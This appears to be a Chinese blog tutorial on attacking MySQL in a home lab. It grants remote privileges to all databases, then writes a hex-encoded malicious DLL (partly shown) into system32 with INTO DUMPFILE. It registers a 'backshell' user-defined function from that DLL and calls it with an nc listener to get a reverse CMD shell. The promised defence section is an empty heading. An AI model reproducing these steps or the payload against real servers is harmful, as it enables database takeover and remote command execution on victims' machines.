在做了之前的SQL SERVER之后，便很想嘗試一下MYSQL的入侵測(cè)試已經(jīng)防范，與大家一起分享。
總的來說，我一直在用的是MYSQL，對(duì)MYSQL比較熟悉，相比較而言，感覺MYSQL更安全，這只是我自己胡亂猜想的，希望不要引起什么爭(zhēng)論神馬的。。。一本饅頭引發(fā)的血案。。。

正題之一

物理機(jī)：Win7
虛擬機(jī)：XP

給予mysql遠(yuǎn)程權(quán)限：

復(fù)制代碼代碼如下:

grant all privileges on *.* to 數(shù)據(jù)庫(kù)賬號(hào)@給予權(quán)限的IP identified by '數(shù)據(jù)庫(kù)密碼';
flush privileges;

給物理機(jī)遠(yuǎn)程權(quán)限：

物理機(jī)成功連接上：

執(zhí)行侵入測(cè)試前（有圖有真相）：

執(zhí)行侵入測(cè)試后（有圖有真相）：

重啟前（有圖有真相）：

重啟后（有圖有真相）：

正題之二：

遠(yuǎn)程登錄之后寫入代碼，代碼在yyd.txt當(dāng)中，然后在MySql中寫入文件：

Win7 打另外一個(gè)cmd，本地端口映射：nc -vv -l -p 端口號(hào)

虛擬機(jī)上：執(zhí)行映射：select backshell("物理機(jī)IP",端口號(hào));

這便執(zhí)行了3306端口反彈CMD

（沒圖了。。。用到了一個(gè)nc軟件執(zhí)行的映射）

yyd.txt大概內(nèi)容：

復(fù)制代碼代碼如下:

et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代碼...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';

正題之三：

防范